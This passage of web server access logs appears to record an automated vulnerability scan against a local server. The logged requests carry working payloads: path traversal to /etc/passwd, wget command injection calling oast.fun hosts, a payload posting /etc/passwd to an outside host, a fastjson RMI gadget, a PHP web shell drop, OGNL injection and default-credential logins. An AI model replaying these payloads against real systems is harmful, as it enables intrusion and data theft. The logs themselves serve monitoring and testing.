10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://c9v8h88smpv8c1ig07h05b54e73fak3ff.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.pwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2M5djhoODhzbXB2OGMxaWcwN2gwaGdzemlpc2JncmZieC5vYXN0LmZ1bmA=\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8h88smpv8c1ig07h0wop45pc4t815m.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h07tso76dur8kbw.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"j_username=admin&j_password=admin&continue=&submit=submit+form","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /0/Authenticate HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://c9v8h8gsmpv8c1qg07h06czhoqkxdi9ji.oast.fun`;busybox wget http://c9v8h8gsmpv8c1qg07h0gk17iztokp5is.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"admuser=admin&admpass=;wget http://c9v8h8gsmpv8c1qg07h045yhp9ao1fwrx.oast.fun;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://c9v8h8gsmpv8c1qg07h0epgenxky4arq6.oast.fun`;wget http://c9v8h8gsmpv8c1qg07h0nxxjn5jtyz449.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 